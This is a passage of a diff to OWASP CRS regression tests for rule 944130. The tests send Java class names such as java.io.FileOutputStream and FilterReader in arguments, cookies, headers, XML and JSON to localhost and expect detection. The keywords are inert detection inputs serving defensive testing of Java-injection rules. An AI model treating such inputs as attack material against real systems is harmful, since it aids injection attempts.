"java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 107 desc: "Nested XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 108 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 109 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FileOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 110 desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FileOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 111 desc: "Argument test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 112 desc: "Argument name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 113 desc: "Cookie test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 114 desc: "Cookie name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 115 desc: "Request header test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 116 desc: "XML attribute value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 117 desc: "XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 118 desc: "Nested XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 119 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 120 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 121 desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 122 desc: "Argument test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 123 desc: "Argument name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 124 desc: "Cookie test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 125 desc: "Cookie name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 126 desc: "Request header test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 127 desc: "XML attribute value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 128 desc: "XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 129 desc: "Nested XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 130 desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 131 desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 132 desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 133 desc: "Argument test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_id: 134 desc: "Argument name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 